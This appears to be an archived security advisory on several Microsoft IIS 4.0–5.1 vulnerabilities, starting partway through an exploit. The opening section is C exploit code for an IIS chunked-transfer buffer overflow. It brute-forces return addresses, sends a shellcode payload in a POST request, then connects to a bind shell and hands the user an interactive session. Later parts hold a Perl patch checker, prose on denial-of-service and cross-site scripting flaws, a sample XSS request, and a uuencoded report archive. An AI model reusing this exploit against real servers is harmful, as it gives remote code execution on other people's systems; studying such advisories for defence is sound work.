	 for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)

	    {   

	     for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;)

	        {    

	          buf[i++] = 0xeb;

	          buf[i++] = 0x06;

	        }

	       *(unsigned int *)&buf[i] = 0x41414141;

	       *(unsigned int *)&buf[i+4] = 0x41414141;

	       *(unsigned int *)&buf[i+8] = 0x41414141;

	

	       memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode));

	       buf[sizeof(buf)-1] = 0;

	       sprintf(buf2,\"POST %s?%s HTTP/1.0\\r\\n\"

	                    \"Content-Type: application/x-www-form-urlencoded\\r\\n\"

	                    \"Transfer-Encoding: chunked\\r\\n\\r\\n\"

	                    \"10\\r\\nDDKDDKDDKDDKDD\\r\\n\"

	                    \"4\\r\\nRETT\\r\\n\"

	                    \"4\\r\\nREWR\\r\\n\"

	                    \"0\\r\\n\\r\\n\\r\\n\",

	                    &target[sel].path,buf);

	  

	       *(unsigned int *)strstr(buf2,\"REWR\") = &target[sel].rewrite;

	       *(unsigned int *)strstr(buf2,\"RETT\") = ret_1;

	       if(brute==0) printf(\" # Sending buffer to socket : \");

	       write(sock,buf2,strlen(buf2));

	

	       fprintf(stderr, \" [+] ret : 0x%08lx ->\",ret_1);

	

	       sleep(3);

	       if(brute==0) printf(\"DONE!\\n\\n\");

	       shutdown(sock,2);

	       close(sock);

	       printf(\" # connecting to our shell - port : [ %d ]\\n\",PORT_BIND);

	       sock=open_back(host,PORT_BIND);

	       if(sock==-1 && brute==0)

	            {

	             printf(\"\\n [-] FAILED \");

	             printf(\"exiting now!\\n\\n\");

	             exit(-1);

	            } 

	       if(sock!=-1) 

	         {

	          printf(\"\\n\\n[+] Address guessed!! \\n\\n\");

	          printf(\"...OH oH OH... done! our evilcode has worked baby at [ %d ]\\n\", ret_1);

	          l33thax0r(sock);

	          exit(0); 

	         }

	    }

	      

	}

	

	

	int resolve (char *IP)

	{

	  struct hostent *info;

	  unsigned long ip;

	

	  if ((ip=inet_addr(IP))==-1)

	    {

	      if ((info=gethostbyname(IP))==0)

	        {

	          printf(\"Couldnt resolve [%s]\\n\", IP);

	          exit(0);

	        }

	      memcpy(&ip, (info->h_addr), 4);

	    }

	  return (ip);

	}

	

	int make_connection(char *address,int port)

	{

	    struct sockaddr_in server,target;

	    int s,i,bf;

	    fd_set wd;

	    struct timeval tv;

	

	    s = socket(AF_INET,SOCK_STREAM,0);

	    if(s<0)

	        return -1;

	    memset((char *)&server,0,sizeof(server));

	    server.sin_family = AF_INET;

	    server.sin_addr.s_addr = htonl(INADDR_ANY);

	    server.sin_port = 0;

	

	    target.sin_family = AF_INET;

	    target.sin_addr.s_addr = resolve(address);

	    if(target.sin_addr.s_addr==0)

	    {

	        close(s);

	        return -2;

	    }

	    target.sin_port = htons(port);

	    bf = 1;

	    ioctl(s,FIONBIO,&bf);

	    tv.tv_sec = 10;

	    tv.tv_usec = 0;

	    FD_ZERO(&wd);

	    FD_SET(s,&wd);

	    connect(s,(struct sockaddr *)&target,sizeof(target));

	    if((i=select(s+1,0,&wd,0,&tv))==(-1))

	    {

	        close(s);

	        return -3;

	    }

	    if(i==0)

	    {

	        close(s);

	        return -4;

	    }

	    i = sizeof(int);

	    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);

	    if((bf!=0)||(i!=sizeof(int)))

	    {

	        close(s);

	        errno = bf;

	        return -5;

	    }

	    ioctl(s,FIONBIO,&bf);

	    return s;

	}

	

	

	

	int open_back(char *host,int port) 

	{

	   int sock, err;

	   struct sockaddr_in server_addr;

	   struct hostent *he;

	   he=gethostbyname(host);

	   if (he == NULL) return -1;

	   server_addr.sin_family = AF_INET;

	   server_addr.sin_port = htons (port);

	   server_addr.sin_addr.s_addr = resolve(host);

	

	   sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	   if (sock == -1) return -1;

	   err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));

	   if (err == -1) sock = -1;  

	   return sock;

	}

	

	

	void l33thax0r(int sock)

	{

	 char buf[1024];

	 fd_set rset;

	 int i;

	 while (1)

	 {

	  FD_ZERO(&rset);

	  FD_SET(sock,&rset);

	  FD_SET(STDIN_FILENO,&rset);

	  select(sock+1,&rset,NULL,NULL,NULL);

	  if (FD_ISSET(sock,&rset))

	  {

	   i=read(sock,buf,1024);

	   if (i <= 0)

	   {

	     printf(\"Fuck... the connection was closed!\\n\");

	     printf(\"exiting...\\n\\n\");

	     exit(0);

	   }

	   buf[i]=0;

	   puts(buf);

	  }

	  if (FD_ISSET(STDIN_FILENO,&rset))

	  {

	   i=read(STDIN_FILENO,buf,1024);

	   if (i>0)

	   {

	    buf[i]=0;

	    write(sock,buf,i);

	   }

	  }

	 }

	}

	

	void usage(char *name) 

	{ 

	 int j = 0;

	  

	  printf(\"Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\\n\", name);

	  printf(\"\\nOptions:\\n\"

	         \"  -h hostname  (www.iisvictim.com)\\n\"

	         \"  -t target\\n\"

		   \"  -p port      (default 80)\\n\"

	         \"  -f path_file (default /iisstart.asp)\\n\"

	         \"  -b step      (brute force, try step 2000)\\n\\n\" 

	         \"Available targets:\\n\\n\");

	  while(target[j].def != 666)

	        {

	          printf(\"  %d ] - %s -\\n\", target[j].def, target[j].descr);

	          j++;

	        }

	  printf(\"\\n\");  

	  exit(1);

	}

	

	

	

	 Problem n°5

	 ===========

	

	 Buffer overrun in HTR ISAPI extension

	

	

	A buffer overrun affecting the HTR ISAPI extension in IIS 4.0  and  5.0.
	By sending a series of specially malformed HTR  requests,  it  could  be
	possible to either cause the IIS  service  to  fail  or,  under  a  very
	difficult operational scenario, to cause code to run on the server.
	

	See report by @Stake [http://www.atstake.com] in file provided below.
	

	Microsoft  IIS  .HTR   heap   overflow   checker   by   Filip   Maertens
	[http://filip.compsec.be] (added 25 April 2002) :
	

	

	#!/usr/bin/perl

	

	########################################################################

	# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker.

	# 

	# DISCLAIMER: This tool is only to be used for legitimate purposes only.

	# This is considered as an intrusive, so  please adhere to the laws  and

	# regulations applicable in your country.  Oh, and honey, there is pizza

	# in the fridge...  

	#

	# CREDITS: @stake/KPMG for the advisory

	#          Thor Larholm for the patch identification remark

	#

	########################################################################

	

	

	use Socket;

	

	print \"iischeck.pl | Microsoft .HTR Heap Overflow Checker | <filip\\@securax.be>\\n-----------------------------------------------------------------------\\n\";

	

	$host= @ARGV[ 0 ];

	$method= @ARGV[ 2 ];

	my $target = inet_aton($host);

	$port = 80;

	

	$requestmethod[0] = \"GET\";

	$requestmethod[1] = \"HEAD\";

	$requestmethod[2] = \"POST\";

	

	

	# Initializing strings & vars

	

	$patchedstring    = \"InsertElementAnchor\";

	$nonpatchedstring = \"document.write\";

	$bogusurl         = \"/xxxiischeckxxx\";

	

	

	# Main loop of rotten code

	

	if ($host ne \"\") {

	

	  print \" -- Checking hostname: $host\\n\";

	  

	  $rawrequest = \"$requestmethod[$method] $bogusurl HTTP/1.1\\nClient-Agent:iischeck.pl\\nHost:$host\\r\\n\\r\\n\";    

	  @results = sendrequestandgetanswer($rawrequest);

	

	  $criticalline = $results[49];   # 49, since HTTP headers are included

	

	  if ($results[2] =~ \"IIS\") {

	  

	    SWITCH: {

	                if ($criticalline =~ $nonpatchedstring) { $patched = \" -- Status: System vulnerable.\"; last SWITCH; }

	                if ($criticalline =~ $patchedstring) { $patched = \" -- Status: System MS02-18 patched.\"; last SWITCH; }

	                $patched = \" -- Status: Cannot identify patch level\";

	            }  

	

	  print \"$patched\\n\\n\";

	  

	  } else {

	  

	    print \" -- Error: System is not a Windows/IIS host.\\n\\n\";

	  

	  }

	

	} else {

	

	  showusage();

	  

	}

	

	

	exit(0);

	

	

	#######: Functions used by iischeck.pl :#######

	

	sub showusage

	    {

	     print \"Usage: iischeck [hostname] -method [method]\\n\";

	    }

	

	sub sendrequestandgetanswer

		{

	 	my ($rawrequest)= @_;

		@lines = sendrawandgetanswer ($rawrequest);

		return @lines;

		}

	

	sub sendrawandgetanswer 

		{

	 	my ($pstr)=@_;

	 	socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\') || 0) || die(\" -- Error in creating socket\\n\");

	 	if (connect(S,pack \"SnA4x8\",2,$port,$target))

			{

	  		my @in=\"\";

	  		select(S); 

			$|=1; 

			print $pstr;

			while(<S>) 

				{

				push @in,$_; 

				last if ($line=~ /^[\\r\\n]+$/ );

				}

	  		select(STDOUT); 

	

			return @in;

	 		} 

		else 

			{ 

			die(\" -- Error connecting to: $host\\n\"); 

			}

		}

	

	

	sub sendraw

		{

	 	my ($pstr)=@_;

	 	socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\') || 0) || die(\"Socket problems\\n\");

	 	if (connect(S,pack \"SnA4x8\",2,$port,$target))

			{

	  		my @in=\"\";

	  		select(S); 

			$|=1; 

			print $pstr;

	

	 		} 

		else 

			{ 

			die(\"connect problems\\n\"); 

			}

		}

	

	

	 Problem n°6

	 ===========

	

	 Access violation in URL error handling

	

	

	A denial of service vulnerability involving the way IIS  4.0,  5.0,  and
	5.1 handle an error condition from ISAPI filters.  At  least  one  ISAPI
	filter  (which  ships  as  part  of  FrontPage  Server  Extensions   and
	ASP.NET), and possibly others, generate  an  error  when  a  request  is
	received containing an URL that exceeds the maximum length  set  by  the
	filter. In processing this error, the filter replaces  the  URL  with  a
	null value. A flaw results because IIS attempts to process  the  URL  in
	the  course  of  sending  the  error  message  back  to  the  requester,
	resulting in an access violation that causes the IIS service to fail.
	

	Peter Gründl of KPMG Danemark added :
	

	Frontpage contains URL parsers for  dynamic  components  (shtml.exe/dll)
	If a malicious user issues a request for /_vti_bin/shtml.exe  where  the
	URL for the dynamic contents is replaced with a long URL, the  submodule
	will filter out the URL, and return a null value to the web service  URL
	parser. An example string would be 35K of ascii 300. This will cause  an
	access violation and Inetinfo.exe will be shut down. Due to  the  nature
	of the crash, we do not feel that it is exploitable beyond the point  of
	a Denial of Service.
	

	See report by @Stake [http://www.atstake.com] in file provided below.
	

	

	 Problem n°7

	 ===========

	

	 Denial of service via FTP Status request

	

	

	A denial of service vulnerability involving the way the FTP  service  in
	IIS 4.0, 5.0 and 5.1 handles a request for the  status  of  the  current
	FTP session. If an attacker were able to establish an FTP  session  with
	an  affected  server,  and  levied  a  status  request  that  created  a
	particular error condition, a flaw in the  FTP  code  would  prevent  it
	from correctly reporting the error. Other code within  the  FTP  service
	would then attempt to use uninitialized data, with an  access  violation
	as the result. This would result in  the  disruption  of  not  only  FTP
	services, but also of web services.
	

	

	 Problem n°8,9,10

	 ================

	

	 Cross-site Scripting in IIS Help File search facility, HTTP Error Page, and Redirect Response message

	

	

	A trio of Cross-Site Scripting (CSS) vulnerabilities affecting IIS  4.0,
	5.0 and 5.1:  one  involving  the  results  page  that’s  returned  when
	searching the IIS Help Files, one involving HTTP error  pages;  and  one
	involving the error message that’s returned to advise that  a  requested
	URL has been redirected. All of  these  vulnerabilities  have  the  same
	scope and effect: an attacker who was able to lure a user into  clicking
	a link on his web site could relay a  request  containing  script  to  a
	third-party web  site  running  IIS,  thereby  causing  the  third-party
	site’s response (still including the script) to be  sent  to  the  user.
	The script  would  then  render  using  the  security  settings  of  the
	third-party site rather than the attacker’s.
	

	See report by Joe Smith and zenomorph  [http://www.cgisecurity.com]  for
	Help File search CSS in file provided below.
	

	Credit   goes   to   Keigo   Yamazaki    of    the    LAC    SNS    Team
	[http://www.lac.co.jp/security/] for redirect response message CSS :
	

	  When a request is submitted to IIS, it returns a \"302 Object Moved\" 

	  error message to the client without changing the metacharacters 

	  contained in the request.  This occurs when the request contains the 

	  following URI:  

	

	  GET /existing directory name?\"><script>alert(\"aaa\"); </script>

	

	See report by Thor Larholm of Jubii A/S [http://www.jubii.dk/] for  HTTP
	Error page CSS in file provided below.
	

	

	UUEncoded file
	

	begin 644 reports.zip

	M4$L#!!0````(`$-HBRP8(/:4/`8``)\\,```-````<F5P;W)T7S$P+G1X=(U7

	M;6_;-A#^+D#_X>\"A:((ZLI.VV.:^H&GC(1F2+HC=8<6V#[1TMIA(HD!2=OSO

	M]QQI.R]-L39%;(GD\\>ZYYYZ[G)U-2%6563GJ&KUDZU1%GZQQ;J(]3W*K6Z^;

	M19K,K:EI1-/2V`_7W4SKK+BA/7FD<V5+4]7[:2(_]U^1X[RSVJ])%4OMC%W3

	M]/RGX?`P30Y^Y)_8^[BF^R;[=,)-K>Q-EB:\'0SINK:[H:#@\\DKVGTXMSFAM;

	M*S^BTOMV-!A<NQ`$W!W`B<\'T\'-</@J.FU?F(SGX,@8SDS(EVN<&>-17*\\X@.

	M7]*%LGD9/,ADQX2QC(A\'=,&%[FIY=SR?<^ZY(-6VE<Z5UZ9QH^]A$$XTZ^\"8

	M;IR\'<^$$^5)Y*HWS#E^9\"IZKKO+T:OB*V%I`U*H%NPQP:8>3>=45[$;!;[\'U

	MBN+GZ^UG=AC7ZE;E_LZ=$(5G52%JRHVYT>PHI%]MO\'(`ID^Y8\'10F%KIAMP6

	M)_+FX;XT*?6URF]D[=1X[*ZPH:!+Y5QKK\">5YZ9KO.L35[Q4P0BRNL03PD&H

	MUG2+$ICD\'B__@DMU:QH.)^Y,\"R(7D\\]`W3EN%FPIKS0VP:K/8_+.&F]-T>4\"

	MYF/T9?W;I!.`5.39UA%\\X(FE&<<$Z.::@S$R\\PT`<*Y@,@WJQ5C6BR9@@)P<

	M4V!-I6^X6F,S-\\IJ(_97)5O&+34`S[7I\'((W\"ZOJ&C&L3%<5:1)OVAHGSD#\'

	M,F*9`0[!W$G&8&:IX5+MMHGK1VY++*6N![@K3;`[XA:BV![@F)F8#`%L>H]C

	M#WB(:`,W\';G.M0+!K.+@0X=*4/1I,HF$O*N9SKEO0)>U<4`%]W,PR4VX\'34(

	M,Z?3Z>4=N27V/FE/*UU55&C75@JR0CW9T1@OB\'=-T0M%$-V\'@U$0--SK\'++V

	M@*6F\\VT\'^B$IS8V\\$#0FXZL_QU?9]/P$AD!.Q(K7:?+EZKP?:#M;@_AJ\'HPH

	MDO`U@%D\'U4&%8Y\\XB:M;D&D+S*88TT39F?96V?4=7^H:9AV%^N80KT30ER?+

	MN`U,F55!@I_@)T[=+S:)^VQ.*Z8*Z2<5Q\"$K?2VO`G!`2N=\"-XE.YUVEK,3/

	M$JA`\'.4B30J3=S7*)UM!S\'B/GK\\]IM.K\\6_O>L_I!:$,5,M[G:TL._!C\'^^>

	M]][+TB8S\\3V]2)/>VX%ZW]M_`YMQZ2HN`:*\"I<R+*\"X2_5Q;MR%;DP>?(.!X

	M#HL\"+<@!DH:,-\'S[<.M@E_6:5>-BQ6[C+M7R?B:0?/N@9&<L!1ON:94O`SQI

	M$K,O-T-532B.&@KN2KR6TN7OVMOX_%$YG4.Z.CS`]2C]]YE%@5BS+G@:P]^Z

	M&D$.^=W0+$WR4EF(M13(Y@:Y#?*\"30/:K<:8&71]F([6HLI]9Z%!X\"*6HW&5

	MHS;\"D=Q8VR$&L7SR>1)HU+61^2N.G`109!E6\\^!<F@0#..^E^*?\'\'VGOV?#7

	M?=K:\'\\2E9Z\\_W1[-:>\\?_(9!MTM-L6Y4#6@J<0KF<4433!,RS+:!K$D%[T<U

	M&=^VE=\'WVE70D4VO?ZOK!>YV-G_7Z^$+VH1HQ[O>CLXQ1^[OX;^9[\'IV]+,<

	M%=]>JNCALS0)GW=S0WP/&??9M<.)-[WW<>W#US^^!*T83$S-GTTSOM7\"1W\\)

	M\"D4!53.,\"S\'.+54$%[[%8.3YB1EE<XU4]M8Z6BA:PE(7*)5`ZNU\"D&\"V4D(0

	M\"@#V>&2(D$U,U3WN>6\'(P#2RWC3.X=\'!\\/`7X3XD?&\\\'Z&JURI`;\"(^9>VDU

	M\\\"\\O&_:#[60WF\'55Q1\"CP=9(IEQ+^WT\"30KT<(]:?7)<*0%$Q78GV%]-!_ZA

	MWZ%E.2.\"\'7PSK4P)&,TP1:(J:G7#M$:Y.:[FX%LC<H;^XB$A,)TF3]H>-\\4!

	M#*)L<N&52&JTWIN49@4!PJA0`(S0<^(P56.0D\'FJ!P]\"U:+@SL:;EL8U)C@(

	M>8\"5\'D]R8=B(=2P=QIL%2^60`TNDNYOY`?[G!C1\'K?&M@JAP&`AIHN7[B,ZU

	MC\'D2YVX$P_UH.$!T-W-<;#-#<0ISF9@X+I8BB<6(<.U&([XSQ(7]F)I&)$VZ

	M,M(CPYTR2<$_#S6!W/DL#O:,E`A^,TB5-%MI,/\\W9<O/%2^4+=S#OPW2Y\'?Y

	M,X*.!Q,ZH#/I^N`57>Z&\'SGY\'U!+`P04````\"``F9XLLW$%K[N8!``!L`P``

	M#````\')E<&]R=%\\V+G1X=+5236O;0!\"]\"_0?YE8\'7\"GMJ9B:UJ2E-6W`-(;2

	MXT@:64/6NV)GUJKRZSOK)(TO/58(@78>^[YFO?Z/3UF4Q=UN^^TSG\"@*!P^1

	M\'*%0!SJ@0D=*K0I47_<_`\'T\'V[O-;@O!T+T+D\\!\"B,JBC^$(*^B0E=Q\'5%&\\

	MIZJUP\\4G/!%L\\OE5)BN+C8(+_@`.19?P2,X\"P;<$>$#V@,ZNS@H\"-`1C:ARW

	M%>P\'0]FK0R9,#P\\4H8V$FE7?L\\(6IAB4\'H7W[+LS]E_2R^*4G*>(#3M6)H&.

	MI4V2K0\\4:546@^JXJNMIFJHCMS%(Z#6;JBV3P9/6&HE.3%/=48_):84R?DC1

	MK?\\BA-H46>>Z2<Z1LJ]O[Z[?OKY^\\RYCR\\)T&4^F@PNVBP#K2$(8VZ\'&[L02

	MHBDMB\\7>C-T^:X*GT0Q&%LFKF^\'(@JJ1FZ24<[#@+OW.%FY9W`S1SG_.$D9T

	MP%Z4L(/0PY%@];XZ%[;Q\\X2S+,]9>II>&L,3LL/&$2RL-`DI6H-MZ`CZ$(]6

	MJ)NO(&]&6<C(9N<18L,#51;.$O\"Y4(AHWPCT6\\D+V\\;<#.@/Y,*A@JV^$A@C

	MJ<YED83ZY#(#\',CL<`L3-8#C\")@Z*](VRZZ=R#GP8:JRA5\\D%XLFRC;[LOM^

	MGKVL9_[[`U!+`P04````\"``:9XLL!=^5WO<\'``\"M$P``#````\')E<&]R=%\\U

	M+G1X=*58VVX;R1%])\\!_Z+?8`#64M#)V0^1BKK0)B*P=071LY,EH]M1H.AI.

	MSW;WB&*^/J>J>\\BA+\'LW6!F6.)>NRZE3-[X-43^0TN6C#<[O%ZJHHU<UZ4ZY

	M1_)5XW;*MFJU6JNKXESIME1OBO/II/)NJQ;J3_F@I?!61Y%5&+?]RW3\"_]3P

	M,_KXXL];.3E3J]84WWYWM]L5(T7??\'E-IO<V[M4R>Y>L&J[4>[VEW^RPNJ.&

	M=\"!UHR-.G5_-+\\[GE^?GEVS\"LNL::W2TKEVH=]9X%UP5X4XDWQ)_J)S?RG-8

	MY:&\'A<^38/ZY;73D5\\:G/]FV=+N@WG_@EV>\':R@=CJT)HN#A0BV5IZV+I/H`

	MX4:WBI[@/FYHO[\'1:_B[U::V+2GC2CH\"!Y-B3>JQ;UKR>M.0\"F)A<8S:LH^U

	M\\PNX_DAJ:2,UZE6I^>\\XZ*^GDX\\$$[U:1QW[L%#YLM9!;?JFH0A@&=!.1U//

	MH(?4A@#X=\'+]\\2=UC4>V%\'2OE^_/&-NS\\_/O+[(==U21I];@\\3,2S#T%TM[4

	M\\R,;)31S?7YUP6(NBO@44_3_\"=<>+>T6?\'$`^P_AF\\%Z!3J\\5C8HK7:TR0`!

	M-@VAN-MI\'Y6K!,?3J(F[X\\`-9UT\'L(\'\'_702]B\'2MF![5BD6)56Z;Z*0T+;P

	MLVG$G%DB:]6WAB]UP^2&?FHY;F6AY#F2TS8$6[VPH42$F[V\"3_(?]I]M--_N

	M=`@[YTO%\\,6`TQ]J(`SBV!##=**_S`HV+CL`W#O74AL%!K9\"=$6\'<+=E`X)Y

	M^J4G2.)[R6XVBVF%\'`QJ9V.MMB[$4S5A!H&0=JJ;\";VA@XK,;=CX(KD+]0S(

	M4Q!%/IS&DX!\';*FD3I+*8<^NKOZUOOL\\\"`Y#-3$.3\'F*$K`/+&I(\'2OQ$+83

	MM8I3L[*\"__-RDIQ?WU[RC>F$=<$X@\'74(CG\"40S,K&7G;:,N9LRARR(Q^8:\"

	M\\;:3HB/D@8[0=YWS<&NKV[TJ;24Y$P5Z%?<=`=[0FYK%<DQF*7H<*NN!9PYN

	ML\"6ISCM#(8\"CA?I44W+\"D[$H.IP).;[\"*ITTB%OP9CJ1@`,E:D/&G`X\'.+K\"

	MD5)M]CBZ6B]O5^.75^MWQ<W//XN?HCF+\'PG(=H@$29.H`)=Y\"(FC`@Q`Z#J8

	MSPR<3N2QLBE+#\\J&\\B?R<]@\'-=LA!.WQ?>1[^Y(*9,^J8BM*AQ/XR]E%X40>

	MJW*0AE\"=>IR2L_=XV9_`?DP;R%6MBTJ;V(/)>]42,7,<IT7\'&=S&P9=44$3H

	M6\'UZ=X3\\&.;U,\\2X>(#HE;WO/=X>`BM8ZW)K6]0(+F\"/C!H*9Z4-%3GLQ_+#

	MXE+&RMFDCU4/B1F`QTFYXR1Q*&&<)..L5:,\\:Y#@TO!0@[9H,=!P3!L/A*SA

	M&`2!IV]AA(*8+TG!S&<K&=<-X9[4ET))4O/QTID>\"B(4(.HGS0*F\'L:+:V96

	M`T`.:7C%C;V.L5O,Y]RLML-1:5>13(U&,Q^,GD?GFC`WM0B96QOPL=\"A&\\2]

	M^9WBWHSDB7.5:[C4YGJ>W=@P20;\\N.CH4)O027>!=]M)W\"FE4]\\3!:%(__^]

	MY=9HN\"5`99W85=J`4#&J#/YIS\\HM8SIAZ\'/Q$9H<A23;.J1Y98V*.CR$U+]J

	MR^6+TX3-$2GCX$F/QY3PO.)(/I8Y!\\=L3+D(SH+%,P@>=!X:&)I/\'Z3BG?8D

	MR\'$&V*D2^$\'_.\'&%0XC9^,\",B^[7NQ[W\\:>N<3;*$`;IOF_\'\'8X[VY#B0U/*

	MQ2@-?:DO)7`\'[]@*R&F353\\>,T_\"=G(.UZM/RW>?.0(]ST(8CPNE$FER,QP_

	M.STM=4\\J%%/K68V`&X:QX7P?FX^VGI)/Q@D,B-3LY2.V\"QL2CZ(@>=IC=8/1

	MH\\!(*\'T[\\91\\^,K<*\\`);SBE.9)BXE`?C:=48ICRJ*L10]&#PJ^MRF\\<!P-^

	MY3`OL.O>-1SX>Z^W7#A`.1L>.\'C9Q5QF:IZ<DZN$H*;F7K)\\KF*\',LM%CF!Q

	M;>_KW.7S#\'U\'`>-6H,40CL?C;&U#Z\'%8\'X=L88G-3^3(;Z\\>@Y#YNS4/X!<_

	M\'\"O\'2UJ\'.26A>:)SM`BEFKCXAATW;M<V3I=AGA<M5OO7_\'EU\\^?OOO_C=Q?J

	M2[%O?J_8\'RZO5()Z.KD;6HH0(H@7O-OMTXJ4G,\\>2WS^[7HA71HN$\';>:3!C

	M[\'&?6TL\'GK312L<>;5B@==I8N&Y4W.^&7JQ^!\'-W?#2E,8\\V8>B$\'.3CMN%D

	M7#B@`5:EDLBSR%W??JU=9[;**)K,?C[*8+24VDTOK1LP75HJORHJCI.>9`@]

	M&>IB<DHF02^C!&_.XM&`3!\\&`5_;2%2%O$1:P%=I@SDAKA$AZ/DX*@A6AK12

	M_?34.70K7+W\"0OEZO,D=\\N;_.`ZD_D,F\"MMAF;UO*0_KJ7^R`UP(0VXI<%\'(

	MGU>I0&F*&M;:D$\"QK6GZ,-HR>/?E3JU>91:;1P*+HZ?\"^?O7L]SRP`#PTI?V

	MO\\2-4_1RTHU&\'X>8;1,QA^U>HI.F%9GL3^KHEXMV2@)>(?`N6&`:043=NL::

	M_>(P0`S?%S$Y4_?-Y8`W?/1P7VKNP8>Q,9<ON^\'%\\.-)+1]K21U4Z4=M&R&@

	MCL^KEZ58,2YSF_?UL]+K*H:Y_#DS-0IPI/W9;A]<IYLS=OBLS#JX=,/5X[<!

	M?P.`6^</7X\"!\"@LUTO9KWS),)[=_OU7_H/VOG^KNN\\\\/M$?],8G&W=ZCS$=9

	MZ4Z^`5-+#$SR3-94#EPI0?T?4$L#!!0````(`%IGBRS;F+>]W`,``,4\'```,

	M````<F5P;W)T7S@N=\'ATC57!CMLV$+T;\\#\\,TD,:8\"-Y-TW1&DW;U$T0\'QH$

	MV:!!4?1`22.+-44*)&6M_SYO2-GQHILB,B\"8XG#FS9MY0Z+_?_ZFS4[3+=>C

	MU_%(+YN##LX?Z9L?Z9_E@K[F44VO[:_U3H?92U&[_C]GWW*<E&?ZR!7\"*5]W

	M],KNM.4K4K:A/W3M77!MI.WVEMZP&>BU-GPR?:UJ;03@5V\':P%6@6QUQOO9Z

	MB-KNZ(TS\'):+_/O-13AUHVV6B]^YYKYB3S>KU;5LOALKHVMZSX95X.7BY>\"U

	MD=T;V?V3;>-\\H(VS4=61+ST\\\\\\W92XX<Z%7;LIBM\'Z#@2K)=+C8NQ#5MJ1FM

	M=52-D6+\'1U+:/H[4>F9:/\\FA?=#.AK4LWKH#&X._%XS>%*LK>14)P9E3&`FK

	MWQ6KQ/7S8G61\"#:[&(=U64[35-CD52I8#MXU8QU#.7$5DO_RGFE_<I_K+;_K

	M@MYY5QE.ZP\\=!Z:3&Y+4U4P&54COX3IUJ%-!\'SH=TE_J%4R-<=-RH2RI\"-+W

	MH#HZBE[7>[@9`];:RI=.V[TX\":YG6>R$R<^\')N\\B\"HJRC7!YI%KU#()=G\\R\"

	M`(F=BH38/\".=H6A[<.;`(7G&J];*H!DYM3#[%,D!R^``))6P=J-IL`Y!5V9.

	M@78*@9*U:T^X6^=[%5%72;`A)Q84CP.\"P:CU:DP@F-\"-FD.D\"8P`$N(%M(9N

	MZ>C&QY?DYDVV$8Z6\"TFM=1)>XFHKYIYR12DG0*UF@/U)]Z#.UR_^50<54D76

	MRK\"/WS:N\'GLX+!K7HRV?_%S`\\;9%PI6[0Y(#B.ER@.0]FY$5?F=TA]%8]@K-

	M4>1FN2D@\\;NL24GO,`MK0OY,UD4-5(UP(!D,N:\\*VG2,JJ=/:@>.*DZ]`1;Q

	M(=92]\'(<=EXU?$GN\'#2K!OG>76Y\"`X_^XG\"5W,I>C5:KA#9,\"+0/A7$8G(\\7

	M\\B#D.%GC5!.(MJEE!N7C<C\'CA=@_2L=_3V&XIG%H5.3B$3VEC.\">/A^`\\R6=

	ME9\'KSG(L(\\;\"0?-4-MRJT<1\"A>&7T9L79XO3.\"ZKT1B&MLH^K&Z>KJY_$-M,

	MQ[,\"([_1$E0E3%L*$SI#4H!V)8\'^2$:AZ[XHUE!@=&6F)/$TT9)R.TQQ,5)H

	M8HWBTJ0Q=:$1MA31R\'GRRYE,:];[<\\)U,D;I\"P/.O\'AW%@KR>1[+\"9\"M3C=5

	MQ;6\"DN:1\"<!Q<D#L=PP)]H.R6EPE68<1\"O%9Z]*9<T]E\'%MD&MBT9/2>13][

	M\"\\%\"72!`V)?1C<14\'DL!F#&:HD@,C4^AA\\#/&(KS-1(Z`>Q2S/E>N;Q.-FXX

	M>KWKXL57N9\'O7Z6?`%!+`P04``(`\"`\"!4J8LLM^M-$<5``\"K-0``#````\')E

	M<&]R=%\\Q+G1X=*U;;5/;R);^C*O\\\'WJ\\E1E(\"2,;&YMDF#M,8`;JDI`\"9K*W

	MAE2J+;6P)K+D54L8[ZW[W_<YI[OU8EYR=VL=\'&RI^_0YSWGMH^93G(;92HNA

	M[_M\"IJ\'X<#,2Y^?7HG]\\_5%<J456*/%+&44J%Y?W*H^2;-7M1\'FV$&_$0N;!

	MSTJM53_`]^W>>WP7[V4<1;DJ>CO=#OW[]\']:H=NY4HF26HD36:@WW8[O[^$\'

	M1(9T\\UIA9%RL<>,LOIN+;4LGR$(EU(,*RB+.4G!P_NGX_9?WQ^_.SC^<BH]Y

	M?!\\GZDZ)\"\\Q/F-!:%VJAQ3\'6#PH5@N#[.,@SG46%<*Q_N!&COB_.TT+EJ2KP

	M(<KRA:0EQ+7*[^-`:1KQU%P6^^698YK9[9PH\'>3QDNZ]H>_\'XKY,4I7+69Q`

	M5!&GHI@K0:AM\'P=%?*^8!&#[*.^4WA\'GU\\<?ST44)UC,$TDF0Q6*V;K;\"54D

	MRZ006%0F\"2N`%-%B41M2VN*QG9=I&J=WI*D=3P0R%3/5[:B\'99+%P$D4F<@9

	M\\V1M`;?H9Q&(\"UD4,OBJ<BV\">08I^^(&O!LVDECI;F<5%W,K4J@PDQ8CKF+\"

	M:@D#,BB!\'$$F0EE(K!@HR$U2P?B2.(BS$J0\"4$P+W1>_K+%<F7X5*K44Z[DK

	MQ5+@0J#8_B!!!I%7L\",E1B!9$%O$?CZ+BUSF6`,2XA>Q6A\'1Y7*9K/NDH9MY

	MK`5^I`\"=-4%(_&RHC612IVN:>`<U%1HBRT+(<!&GL<8Z199CW3C5!2F\'\\*BM

	MB!>+(?!2%L%<2\"UT1EK48IEI\'<\\291D!MED\"SR&9U8-<+!,%MD%/S[,5$W5<

	M):2G-(P)W;X0G^RX$JXF:U/I2[W$HG\"51($/&4$IPO%(\'#QI/0P4%NMV$GBM

	M+O@ZM`]*P5?-K)X:YMZ8X/\"Z]?I%W<7D%Y`L2U]OO+J=CY?7-V(OCC6XR`OF

	M\\.SFYN/>H#^`MP2!6A9OQ.L]C#S+-#ZZR-3MO,M@5&FQ>[->JC=\"$J8!F]?>

	MP^YJM=HE*]DM\\X3-1H4`-)>I1D3:/;6&],88%MWK=@;PUX_\')ZV?;F<$%SZ^

	M.38?3J]O$+.ZG3\\5F?/GQH>V5*>PCF<$)I\'!B0KF*;A-Q&9\\(*4[56M#0L@9

